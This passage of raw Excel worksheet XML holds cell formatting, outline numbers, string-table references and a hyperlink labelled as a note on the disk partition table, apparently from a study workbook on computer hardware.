    <row r="20" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A20" s="2"/>
      <c r="B20" s="181"/>
      <c r="C20" s="173">
        <v>2.7</v>
      </c>
      <c r="D20" s="181" t="s">
        <v>4382</v>
      </c>
      <c r="E20" s="186"/>
    </row>
    <row r="21" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A21" s="2"/>
      <c r="B21" s="181"/>
      <c r="C21" s="173">
        <v>2.8</v>
      </c>
      <c r="D21" s="181" t="s">
        <v>4398</v>
      </c>
      <c r="E21" s="181" t="s">
        <v>4399</v>
      </c>
    </row>
    <row r="22" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A22" s="2"/>
      <c r="B22" s="181"/>
      <c r="C22" s="173"/>
      <c r="D22" s="181"/>
      <c r="E22" s="181"/>
    </row>
    <row r="23" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A23" s="2"/>
      <c r="B23" s="181" t="s">
        <v>4377</v>
      </c>
      <c r="C23" s="173"/>
      <c r="D23" s="181"/>
    </row>
    <row r="24" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A24" s="2"/>
      <c r="B24" s="181"/>
      <c r="C24" s="173">
        <v>3.1</v>
      </c>
      <c r="D24" s="181" t="s">
        <v>4400</v>
      </c>
      <c r="E24" s="181"/>
    </row>
    <row r="25" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A25" s="2"/>
      <c r="B25" s="181"/>
      <c r="C25" s="173">
        <v>3.2</v>
      </c>
      <c r="D25" s="181" t="s">
        <v>4401</v>
      </c>
      <c r="E25" s="181"/>
    </row>
    <row r="26" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A26" s="2"/>
      <c r="B26" s="181"/>
      <c r="C26" s="173">
        <v>3.3</v>
      </c>
      <c r="D26" s="181" t="s">
        <v>4402</v>
      </c>
      <c r="E26" s="181"/>
    </row>
    <row r="27" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A27" s="2"/>
      <c r="B27" s="181"/>
      <c r="C27" s="173"/>
      <c r="D27" s="181"/>
      <c r="E27" s="181"/>
    </row>
    <row r="28" spans="1:5" s="58" customFormat="1" ht="76.2" customHeight="1" thickBot="1">
      <c r="A28" s="2"/>
      <c r="B28" s="575" t="s">
        <v>4895</v>
      </c>
      <c r="C28" s="575"/>
      <c r="D28" s="575"/>
      <c r="E28" s="575"/>
    </row>
    <row r="29" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A29" s="2"/>
      <c r="B29" s="302"/>
      <c r="C29" s="327" t="s">
        <v>4897</v>
      </c>
      <c r="D29" s="302"/>
      <c r="E29" s="302"/>
    </row>
    <row r="30" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A30" s="2"/>
      <c r="B30" s="181"/>
      <c r="C30" s="173"/>
      <c r="D30" s="181"/>
      <c r="E30" s="181"/>
    </row>
    <row r="31" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A31" s="2"/>
      <c r="B31" s="181" t="s">
        <v>4741</v>
      </c>
      <c r="C31" s="173"/>
      <c r="D31" s="181"/>
      <c r="E31" s="181"/>
    </row>
    <row r="32" spans="1:5" s="58" customFormat="1" ht="30" customHeight="1" thickBot="1">
      <c r="A32" s="2"/>
      <c r="B32" s="576" t="s">
        <v>4742</v>
      </c>
      <c r="C32" s="576"/>
      <c r="D32" s="576"/>
      <c r="E32" s="576"/>
    </row>
    <row r="33" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A33" s="2"/>
      <c r="B33" s="576" t="s">
        <v>4743</v>
      </c>
      <c r="C33" s="576"/>
      <c r="D33" s="576"/>
      <c r="E33" s="576"/>
    </row>
    <row r="34" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A34" s="2"/>
      <c r="B34" s="181" t="s">
        <v>4744</v>
      </c>
      <c r="C34" s="173"/>
      <c r="D34" s="181"/>
      <c r="E34" s="181"/>
    </row>
    <row r="35" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A35" s="2"/>
      <c r="B35" s="181"/>
      <c r="C35" s="173">
        <v>4.0999999999999996</v>
      </c>
      <c r="D35" s="181" t="s">
        <v>4757</v>
      </c>
      <c r="E35" s="181"/>
    </row>
    <row r="36" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A36" s="2"/>
      <c r="B36" s="325">
        <v>442</v>
      </c>
      <c r="C36" s="173"/>
      <c r="D36" s="181" t="s">
        <v>4745</v>
      </c>
      <c r="E36" s="181"/>
    </row>
    <row r="37" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A37" s="2"/>
      <c r="B37" s="181">
        <v>4</v>
      </c>
      <c r="C37" s="173"/>
      <c r="D37" s="181" t="s">
        <v>4758</v>
      </c>
      <c r="E37" s="181"/>
    </row>
    <row r="38" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A38" s="2"/>
      <c r="B38" s="181">
        <v>64</v>
      </c>
      <c r="C38" s="173"/>
      <c r="D38" s="303" t="s">
        <v>4892</v>
      </c>
      <c r="E38" s="181"/>
    </row>
    <row r="39" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A39" s="2"/>
      <c r="B39" s="181">
        <v>2</v>
      </c>
      <c r="C39" s="173"/>
      <c r="D39" s="181" t="s">
        <v>4746</v>
      </c>
      <c r="E39" s="181"/>
    </row>
    <row r="40" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A40" s="2"/>
      <c r="B40" s="326">
        <f>SUM(B36:B39)</f>
        <v>512</v>
      </c>
      <c r="C40" s="173">
        <v>4.2</v>
      </c>
      <c r="D40" s="181" t="s">
        <v>4894</v>
      </c>
      <c r="E40" s="181"/>
    </row>
    <row r="41" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A41" s="2"/>
      <c r="B41" s="181"/>
      <c r="C41" s="173"/>
      <c r="D41" s="181" t="s">
        <v>4406</v>
      </c>
      <c r="E41" s="181"/>
    </row>
    <row r="42" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A42" s="2"/>
      <c r="B42" s="181"/>
      <c r="C42" s="173"/>
      <c r="D42" s="181" t="s">
        <v>4893</v>
      </c>
      <c r="E42" s="181"/>
    </row>
    <row r="43" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A43" s="2"/>
      <c r="B43" s="181"/>
      <c r="C43" s="173">
        <v>4.3</v>
      </c>
      <c r="D43" s="181" t="s">
        <v>4403</v>
      </c>
      <c r="E43" s="181"/>
    </row>
    <row r="44" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A44" s="2"/>
      <c r="B44" s="181"/>
      <c r="C44" s="173">
        <v>4.4000000000000004</v>
      </c>
      <c r="D44" s="181" t="s">
        <v>4404</v>
      </c>
      <c r="E44" s="181"/>
    </row>
    <row r="45" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A45" s="2"/>
      <c r="B45" s="181"/>
      <c r="C45" s="173"/>
      <c r="D45" s="181" t="s">
        <v>4407</v>
      </c>
      <c r="E45" s="181"/>
    </row>
    <row r="46" spans="1:5" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A46" s="2"/>
      <c r="B46" s="181"/>
      <c r="C46" s="173">
        <v>4.5</v>
      </c>
      <c r="D46" s="181" t="s">
        <v>4405</v>
      </c>
      <c r="E46" s="181"/>
    </row>
    <row r="47" spans="1:5" ht="31.2" customHeight="1">
      <c r="D47" s="574" t="s">
        <v>4408</v>
      </c>
      <c r="E47" s="574"/>
    </row>
    <row r="49" spans="1:6" ht="15" thickBot="1">
      <c r="C49" s="58" t="s">
        <v>4737</v>
      </c>
    </row>
    <row r="50" spans="1:6" ht="85.8" customHeight="1" thickBot="1">
      <c r="D50" s="574" t="s">
        <v>4740</v>
      </c>
      <c r="E50" s="574"/>
    </row>
    <row r="51" spans="1:6" ht="15" thickBot="1">
      <c r="A51" s="147" t="s">
        <v>4762</v>
      </c>
      <c r="B51" s="104"/>
      <c r="C51"/>
      <c r="D51"/>
      <c r="E51"/>
      <c r="F51"/>
    </row>
    <row r="52" spans="1:6" ht="15" thickBot="1">
      <c r="A52" s="2">
        <v>1</v>
      </c>
      <c r="B52" s="174" t="s">
        <v>4747</v>
      </c>
      <c r="C52"/>
      <c r="D52"/>
      <c r="E52"/>
      <c r="F52"/>
    </row>
    <row r="53" spans="1:6" ht="15" thickBot="1">
      <c r="A53" s="2">
        <v>1</v>
      </c>
      <c r="B53" s="174" t="s">
        <v>4748</v>
      </c>
      <c r="C53"/>
      <c r="D53"/>
      <c r="E53"/>
      <c r="F53"/>
    </row>
    <row r="54" spans="1:6" ht="15" thickBot="1">
      <c r="A54" s="2">
        <v>6</v>
      </c>
      <c r="B54" s="174" t="s">
        <v>4749</v>
      </c>
      <c r="C54" s="147"/>
      <c r="D54"/>
      <c r="E54"/>
      <c r="F54"/>
    </row>
    <row r="55" spans="1:6" ht="15" thickBot="1">
      <c r="A55" s="2">
        <v>10</v>
      </c>
      <c r="B55" s="174" t="s">
        <v>4750</v>
      </c>
      <c r="C55" s="147"/>
      <c r="D55"/>
      <c r="E55"/>
      <c r="F55"/>
    </row>
    <row r="56" spans="1:6" ht="15" thickBot="1">
      <c r="A56" s="2">
        <v>1</v>
      </c>
      <c r="B56" s="174" t="s">
        <v>4751</v>
      </c>
      <c r="C56" s="147"/>
      <c r="D56"/>
      <c r="E56"/>
      <c r="F56"/>
    </row>
    <row r="57" spans="1:6" ht="15" thickBot="1">
      <c r="A57" s="2">
        <v>1</v>
      </c>
      <c r="B57" s="174" t="s">
        <v>4752</v>
      </c>
      <c r="C57" s="147"/>
      <c r="D57"/>
      <c r="E57"/>
      <c r="F57"/>
    </row>
    <row r="58" spans="1:6" ht="15" thickBot="1">
      <c r="A58" s="2">
        <v>6</v>
      </c>
      <c r="B58" s="174" t="s">
        <v>4753</v>
      </c>
      <c r="C58" s="147"/>
      <c r="D58"/>
      <c r="E58"/>
      <c r="F58"/>
    </row>
    <row r="59" spans="1:6" ht="15" thickBot="1">
      <c r="A59" s="2">
        <v>10</v>
      </c>
      <c r="B59" s="174" t="s">
        <v>4754</v>
      </c>
      <c r="C59" s="147"/>
      <c r="D59"/>
      <c r="E59"/>
      <c r="F59"/>
    </row>
    <row r="60" spans="1:6" ht="15" thickBot="1">
      <c r="A60" s="2">
        <v>4</v>
      </c>
      <c r="B60" s="174" t="s">
        <v>4755</v>
      </c>
      <c r="C60" s="147"/>
      <c r="D60"/>
      <c r="E60"/>
      <c r="F60"/>
    </row>
    <row r="61" spans="1:6" ht="15" thickBot="1">
      <c r="A61" s="2">
        <v>4</v>
      </c>
      <c r="B61" s="174" t="s">
        <v>4756</v>
      </c>
      <c r="C61" s="147"/>
      <c r="D61"/>
      <c r="E61"/>
      <c r="F61"/>
    </row>
    <row r="62" spans="1:6">
      <c r="A62" s="2">
        <f>SUM(A52:A61)</f>
        <v>44</v>
      </c>
    </row>
    <row r="63" spans="1:6" ht="30" customHeight="1" thickBot="1">
      <c r="B63" s="489" t="s">
        <v>4759</v>
      </c>
      <c r="C63" s="489"/>
      <c r="D63" s="489"/>
      <c r="E63" s="489"/>
    </row>
    <row r="65" spans="2:5" ht="14.4" customHeight="1" thickBot="1">
      <c r="B65" s="489" t="s">
        <v>4760</v>
      </c>
      <c r="C65" s="489"/>
      <c r="D65" s="489"/>
      <c r="E65" s="489"/>
    </row>
    <row r="67" spans="2:5" ht="48.6" customHeight="1" thickBot="1">
      <c r="B67" s="489" t="s">
        <v>4761</v>
      </c>
      <c r="C67" s="489"/>
      <c r="D67" s="489"/>
      <c r="E67" s="489"/>
    </row>
    <row r="68" spans="2:5" ht="48.6" customHeight="1" thickBot="1">
      <c r="B68" s="489" t="s">
        <v>4896</v>
      </c>
      <c r="C68" s="489"/>
      <c r="D68" s="489"/>
      <c r="E68" s="489"/>
    </row>
    <row r="70" spans="2:5">
      <c r="B70" s="58" t="s">
        <v>4888</v>
      </c>
    </row>
    <row r="71" spans="2:5">
      <c r="B71" s="58" t="s">
        <v>4890</v>
      </c>
    </row>
    <row r="72" spans="2:5">
      <c r="B72" s="58" t="s">
        <v>4889</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="10">
    <mergeCell ref="B3:E3"/>
    <mergeCell ref="B68:E68"/>
    <mergeCell ref="B65:E65"/>
    <mergeCell ref="B67:E67"/>
    <mergeCell ref="B28:E28"/>
    <mergeCell ref="D47:E47"/>
    <mergeCell ref="D50:E50"/>
    <mergeCell ref="B32:E32"/>
    <mergeCell ref="B33:E33"/>
    <mergeCell ref="B63:E63"/>
  </mergeCells>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="D38" location="硬盘!A63" display="c DPT（Disk Partition Table)分区表；64B；"/>
    <hyperlink ref="B1" r:id="rId1"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="72" orientation="portrait" horizontalDpi="200" verticalDpi="200" r:id="rId2"/>
  <drawing r:id="rId3"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet111.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor rgb="FFC00000"/>
  </sheetPr>
  <dimension ref="A1:J28"/>
  <sheetViews>
    <sheetView showGridLines="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5.44140625" style="58" customWidth="1"/>
    <col min="3" max="3" width="7.33203125" style="2" customWidth="1"/>
    <col min="4" max="4" width="29.109375" style="58" customWidth="1"/>
    <col min="5" max="5" width="28.109375" style="58" customWidth="1"/>
    <col min="6" max="6" width="16.33203125" style="58" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="15.6">
      <c r="B1" s="3" t="s">
        <v>5840</v>
      </c>
      <c r="C1" s="183"/>
      <c r="D1" s="62"/>
      <c r="E1" s="62"/>
    </row>
    <row r="2" spans="1:10">
      <c r="B2" s="180"/>
      <c r="C2" s="182"/>
      <c r="D2" s="180"/>
      <c r="E2" s="180"/>
    </row>
    <row r="3" spans="1:10" ht="46.2" customHeight="1">
      <c r="B3" s="572" t="s">
        <v>5838</v>
      </c>
      <c r="C3" s="572"/>
      <c r="D3" s="572"/>
      <c r="E3" s="572"/>
      <c r="F3" s="572"/>
      <c r="G3" s="572"/>
      <c r="H3" s="572"/>
      <c r="I3" s="572"/>
    </row>
    <row r="4" spans="1:10">
      <c r="B4" s="180"/>
      <c r="C4" s="182"/>
      <c r="D4" s="180"/>
      <c r="E4" s="180"/>
    </row>
    <row r="5" spans="1:10" ht="74.400000000000006" customHeight="1">
      <c r="B5" s="572" t="s">
        <v>5839</v>
      </c>
      <c r="C5" s="572"/>
      <c r="D5" s="572"/>
      <c r="E5" s="572"/>
      <c r="F5" s="572"/>
      <c r="G5" s="572"/>
      <c r="H5" s="572"/>
      <c r="I5" s="572"/>
      <c r="J5" s="572"/>
    </row>
    <row r="6" spans="1:10" ht="15" thickBot="1">
      <c r="B6" s="180"/>
      <c r="C6" s="182"/>
      <c r="D6" s="180"/>
      <c r="E6" s="180"/>
    </row>
    <row r="7" spans="1:10" ht="15" thickBot="1">
      <c r="B7" s="181" t="s">
        <v>4353</v>
      </c>
      <c r="C7" s="173"/>
      <c r="D7" s="181"/>
      <c r="E7" s="184"/>
    </row>
    <row r="8" spans="1:10" ht="15" thickBot="1">
      <c r="B8" s="181"/>
      <c r="C8" s="173">
        <v>1.1000000000000001</v>
      </c>
      <c r="D8" s="181" t="s">
        <v>4366</v>
      </c>
      <c r="E8" s="185" t="s">
        <v>4367</v>
      </c>
    </row>
    <row r="9" spans="1:10" ht="15" thickBot="1">
      <c r="B9" s="181"/>
      <c r="C9" s="173">
        <v>1.2</v>
      </c>
      <c r="D9" s="181" t="s">
        <v>4368</v>
      </c>
      <c r="E9" s="186" t="s">
        <v>4371</v>
      </c>
    </row>
    <row r="10" spans="1:10" ht="15" thickBot="1">
      <c r="B10" s="181"/>
      <c r="C10" s="173">
        <v>1.3</v>
      </c>
      <c r="D10" s="181" t="s">
        <v>4369</v>
      </c>
      <c r="E10" s="186" t="s">
        <v>4372</v>
      </c>
    </row>
    <row r="11" spans="1:10" ht="15" thickBot="1">
      <c r="B11" s="181"/>
      <c r="C11" s="173">
        <v>1.4</v>
      </c>
      <c r="D11" s="181" t="s">
        <v>4370</v>
      </c>
      <c r="E11" s="186" t="s">
        <v>4373</v>
      </c>
    </row>
    <row r="12" spans="1:10" ht="15" thickBot="1">
      <c r="B12" s="181"/>
      <c r="C12" s="173">
        <v>1.5</v>
      </c>
      <c r="D12" s="181"/>
      <c r="E12" s="186"/>
    </row>
    <row r="13" spans="1:10" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A13" s="2"/>
      <c r="B13" s="181" t="s">
        <v>4354</v>
      </c>
      <c r="C13" s="247"/>
      <c r="D13" s="184"/>
      <c r="E13" s="184"/>
    </row>
    <row r="14" spans="1:10" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A14" s="2"/>
      <c r="B14" s="181"/>
      <c r="C14" s="250"/>
      <c r="D14" s="253" t="s">
        <v>4358</v>
      </c>
      <c r="E14" s="257" t="s">
        <v>4326</v>
      </c>
      <c r="F14" s="258" t="s">
        <v>4359</v>
      </c>
    </row>
    <row r="15" spans="1:10" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A15" s="2"/>
      <c r="B15" s="181"/>
      <c r="C15" s="251" t="s">
        <v>4355</v>
      </c>
      <c r="D15" s="254">
        <v>4.2361111111111106E-2</v>
      </c>
      <c r="E15" s="259"/>
      <c r="F15" s="260"/>
    </row>
    <row r="16" spans="1:10" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A16" s="2"/>
      <c r="B16" s="181"/>
      <c r="C16" s="251" t="s">
        <v>4356</v>
      </c>
      <c r="D16" s="255" t="s">
        <v>4360</v>
      </c>
      <c r="E16" s="259">
        <v>184</v>
      </c>
      <c r="F16" s="260" t="s">
        <v>4362</v>
      </c>
    </row>
    <row r="17" spans="1:6" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A17" s="2"/>
      <c r="B17" s="181"/>
      <c r="C17" s="252" t="s">
        <v>4357</v>
      </c>
      <c r="D17" s="256" t="s">
        <v>4361</v>
      </c>
      <c r="E17" s="261">
        <v>240</v>
      </c>
      <c r="F17" s="262" t="s">
        <v>4363</v>
      </c>
    </row>
    <row r="18" spans="1:6" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A18" s="2"/>
      <c r="B18" s="181"/>
      <c r="C18" s="164"/>
      <c r="D18" s="162"/>
      <c r="E18" s="164"/>
      <c r="F18" s="164"/>
    </row>
    <row r="19" spans="1:6" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A19" s="2"/>
      <c r="B19" s="181" t="s">
        <v>4364</v>
      </c>
      <c r="C19" s="248"/>
      <c r="D19" s="249"/>
      <c r="E19" s="249"/>
    </row>
    <row r="20" spans="1:6" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A20" s="2"/>
      <c r="B20" s="174"/>
      <c r="C20" s="174" t="s">
        <v>4365</v>
      </c>
      <c r="D20" s="181"/>
      <c r="E20" s="181"/>
    </row>
    <row r="21" spans="1:6" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A21" s="2"/>
      <c r="B21" s="181"/>
      <c r="C21" s="173"/>
      <c r="D21" s="181"/>
      <c r="E21" s="181"/>
    </row>
    <row r="22" spans="1:6" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A22" s="2"/>
      <c r="B22" s="181"/>
      <c r="C22" s="65"/>
      <c r="D22" s="181"/>
      <c r="E22" s="181"/>
    </row>
    <row r="23" spans="1:6" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A23" s="2"/>
      <c r="B23" s="181"/>
      <c r="C23" s="66"/>
      <c r="D23" s="181"/>
      <c r="E23" s="181"/>
    </row>
    <row r="24" spans="1:6" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A24" s="2"/>
      <c r="B24" s="181"/>
      <c r="C24" s="67"/>
      <c r="D24" s="181"/>
      <c r="E24" s="181"/>
    </row>
    <row r="25" spans="1:6" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A25" s="2"/>
      <c r="B25" s="181"/>
      <c r="C25"/>
      <c r="D25" s="181"/>
      <c r="E25" s="181"/>
    </row>
    <row r="26" spans="1:6" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A26" s="2"/>
      <c r="B26" s="181"/>
      <c r="C26" s="173"/>
      <c r="D26" s="181"/>
      <c r="E26" s="181"/>
    </row>
    <row r="27" spans="1:6" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A27" s="2"/>
      <c r="B27" s="181"/>
      <c r="C27" s="173"/>
      <c r="D27" s="181"/>
      <c r="E27" s="181"/>
    </row>
    <row r="28" spans="1:6" s="58" customFormat="1" ht="15" thickBot="1">
      <c r="A28" s="2"/>
      <c r="B28" s="181"/>
      <c r="C28" s="173"/>
      <c r="D28" s="181"/>
      <c r="E28" s="181"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="B3:I3"/>
    <mergeCell ref="B5:J5"/>
  </mergeCells>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="B1" r:id="rId1"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="72" orientation="portrait" horizontalDpi="200" verticalDpi="200" r:id="rId2"/>
  <drawing r:id="rId3"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet112.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr>
    <tabColor rgb="FF0070C0"/>
  </sheetPr>
  <dimension ref="A1:F35"/>
  <sheetViews>
    <sheetView showGridLines="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5.44140625" style="58" customWidth="1"/>
    <col min="3" max="3" width="6.109375" style="2" customWidth="1"/>
    <col min="4" max="4" width="20.109375" style="58" customWidth="1"/>
    <col min="5" max="5" width="86.88671875" style="58" customWidth="1"/>
    <col min="6" max="6" width="16.33203125" style="58" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:5" ht="15.6">
      <c r="B1" s="3" t="s">
        <v>5866</v>
      </c>
      <c r="C1" s="183"/>
      <c r="D1" s="62"/>
      <c r="E1" s="62"/>
    </row>
    <row r="2" spans="2:5">
      <c r="B2" s="180"/>
      <c r="C2" s="182"/>
      <c r="D2" s="180"/>
      <c r="E2" s="180"/>
    </row>
    <row r="3" spans="2:5" ht="52.8" customHeight="1">
      <c r="B3" s="572" t="s">
        <v>5863</v>
      </c>
      <c r="C3" s="572"/>
      <c r="D3" s="572"/>
      <c r="E3" s="572"/>
    </row>
    <row r="4" spans="2:5">
      <c r="B4" s="180"/>
      <c r="C4" s="182"/>
      <c r="D4" s="180"/>
      <c r="E4" s="180"/>
    </row>
    <row r="5" spans="2:5" ht="46.2" customHeight="1">
      <c r="B5" s="469" t="s">
        <v>5864</v>
      </c>
      <c r="C5" s="469"/>
      <c r="D5" s="469"/>
      <c r="E5" s="469"/>
    </row>
    <row r="6" spans="2:5">
      <c r="B6" s="180"/>
      <c r="C6" s="182"/>
      <c r="D6" s="180"/>
      <c r="E6" s="180"/>
    </row>
    <row r="7" spans="2:5" ht="41.4" customHeight="1">
      <c r="B7" s="573" t="s">
        <v>5865</v>
      </c>
      <c r="C7" s="573"/>
      <c r="D7" s="573"/>
      <c r="E7" s="573"/>
    </row>
    <row r="8" spans="2:5" ht="15" thickBot="1">
      <c r="B8" s="180"/>
      <c r="C8" s="182"/>
      <c r="D8" s="180"/>
      <c r="E8" s="180"/>
    </row>
    <row r="9" spans="2:5" ht="15" thickBot="1">
      <c r="B9" s="181" t="s">
        <v>3172</v>
      </c>
      <c r="C9" s="174"/>
      <c r="D9" s="181"/>
      <c r="E9" s="184"/>
    </row>
    <row r="10" spans="2:5" ht="15" thickBot="1">
      <c r="B10" s="181"/>
      <c r="C10" s="173">
        <v>1.1000000000000001</v>
      </c>
      <c r="D10" s="181" t="s">
        <v>3173</v>
      </c>
      <c r="E10" s="185" t="s">
        <v>3184</v>
      </c>
    </row>
    <row r="11" spans="2:5" ht="15" thickBot="1">
      <c r="B11" s="181"/>
      <c r="C11" s="173">
        <v>1.2</v>
      </c>
      <c r="D11" s="181" t="s">
        <v>3174</v>
      </c>
      <c r="E11" s="186" t="s">
        <v>3185</v>
      </c>
    </row>
    <row r="12" spans="2:5" ht="15" thickBot="1">
      <c r="B12" s="181"/>
      <c r="C12" s="173">
        <v>1.3</v>
      </c>
      <c r="D12" s="181" t="s">
        <v>3175</v>
      </c>
      <c r="E12" s="186" t="s">
        <v>3186</v>
      </c>
    </row>
    <row r="13" spans="2:5" ht="15" thickBot="1">
      <c r="B13" s="181"/>
      <c r="C13" s="173">
        <v>1.4</v>
      </c>
      <c r="D13" s="181" t="s">
        <v>3176</v>
      </c>
      <c r="E13" s="186" t="s">
        <v>3187</v>
      </c>
    </row>
    <row r="14" spans="2:5" ht="15" thickBot="1">
      <c r="B14" s="181"/>
      <c r="C14" s="173">
        <v>1.5</v>
      </c>
      <c r="D14" s="181" t="s">
        <v>3177</v>
      </c>
      <c r="E14" s="186" t="s">
        <v>3188</v>
      </c>
    </row>
    <row r="15" spans="2:5" ht="15" thickBot="1">
      <c r="B15" s="181"/>
      <c r="C15" s="173">
        <v>1.6</v>
      </c>
      <c r="D15" s="181" t="s">
        <v>3190</v>
      </c>
      <c r="E15" s="186" t="s">
        <v>3189</v>
      </c>
    </row>
    <row r="16" spans="2:5" ht="15" thickBot="1">
      <c r="B16" s="181"/>
      <c r="C16" s="173">
        <v>1.7</v>
      </c>
      <c r="D16" s="181" t="s">
        <v>3178</v>
      </c>
      <c r="E16" s="186" t="s">
        <v>3191</v>
      </c>
    </row>
    <row r="17" spans="2:5" ht="15" thickBot="1">
      <c r="B17" s="181"/>
      <c r="C17" s="173">
        <v>1.8</v>
      </c>
      <c r="D17" s="181" t="s">
        <v>3179</v>
      </c>
      <c r="E17" s="186" t="s">
        <v>3192</v>
      </c>
    </row>
    <row r="18" spans="2:5" ht="15" thickBot="1">
      <c r="B18" s="181"/>
      <c r="C18" s="173">
        <v>1.9</v>
      </c>
      <c r="D18" s="181" t="s">
        <v>3180</v>
      </c>
      <c r="E18" s="186"/>
    </row>
    <row r="19" spans="2:5" ht="15" thickBot="1">
      <c r="B19" s="181"/>
      <c r="C19" s="173">
        <v>1.1000000000000001</v>
      </c>
      <c r="D19" s="181" t="s">
        <v>3181</v>
      </c>
      <c r="E19" s="186"/>
    </row>
    <row r="20" spans="2:5" ht="15" thickBot="1">
      <c r="B20" s="181"/>
      <c r="C20" s="173">
        <v>1.1100000000000001</v>
      </c>
      <c r="D20" s="181" t="s">
        <v>3182</v>
      </c>
      <c r="E20" s="186"/>
    </row>
    <row r="21" spans="2:5" ht="15" thickBot="1">
      <c r="B21" s="181"/>
      <c r="C21" s="173">
        <v>1.1200000000000001</v>
      </c>
      <c r="D21" s="181" t="s">
        <v>3183</v>
      </c>
      <c r="E21" s="186"/>
    </row>
    <row r="22" spans="2:5" ht="15" thickBot="1">
      <c r="B22" s="181" t="s">
        <v>3193</v>
      </c>
      <c r="C22" s="173"/>
      <c r="D22" s="181"/>
      <c r="E22" s="181"/>
    </row>
    <row r="23" spans="2:5" ht="15" thickBot="1">
      <c r="B23" s="181"/>
      <c r="C23" s="173">
        <v>1.1000000000000001</v>
      </c>
      <c r="D23" s="181" t="s">
        <v>3194</v>
      </c>
      <c r="E23" s="186" t="s">
        <v>3197</v>
      </c>
    </row>
    <row r="24" spans="2:5" ht="15" thickBot="1">
      <c r="B24" s="181"/>
      <c r="C24" s="173">
        <v>1.2</v>
      </c>
      <c r="D24" s="181" t="s">
        <v>3195</v>
      </c>
      <c r="E24" s="186" t="s">
        <v>3198</v>
      </c>
    </row>
    <row r="25" spans="2:5" ht="15" thickBot="1">
      <c r="B25" s="181"/>
      <c r="C25" s="173">
        <v>1.3</v>
      </c>
      <c r="D25" s="181" t="s">
        <v>3196</v>
      </c>
      <c r="E25" s="181"/>
    </row>
    <row r="26" spans="2:5" ht="15" thickBot="1">
      <c r="B26" s="181" t="s">
        <v>3199</v>
      </c>
      <c r="C26" s="173"/>
      <c r="D26" s="181"/>
      <c r="E26" s="181"/>
    </row>
    <row r="27" spans="2:5" ht="15" thickBot="1">
      <c r="B27" s="181"/>
      <c r="C27" s="173">
        <v>1.1000000000000001</v>
      </c>
      <c r="D27" s="181" t="s">
        <v>3200</v>
      </c>
      <c r="E27" s="181"/>
    </row>
    <row r="28" spans="2:5" ht="15" thickBot="1">
      <c r="B28" s="181"/>
      <c r="C28" s="173">
        <v>1.2</v>
      </c>
      <c r="D28" s="181" t="s">
        <v>3201</v>
      </c>
      <c r="E28" s="181"/>
    </row>
    <row r="29" spans="2:5" ht="15" thickBot="1">
      <c r="B29" s="181"/>
      <c r="C29" s="173"/>
      <c r="D29" s="181"/>
      <c r="E29" s="181"/>
    </row>
    <row r="30" spans="2:5" ht="15" thickBot="1">
      <c r="B30" s="181"/>
      <c r="C30" s="173"/>
      <c r="D30" s="181"/>
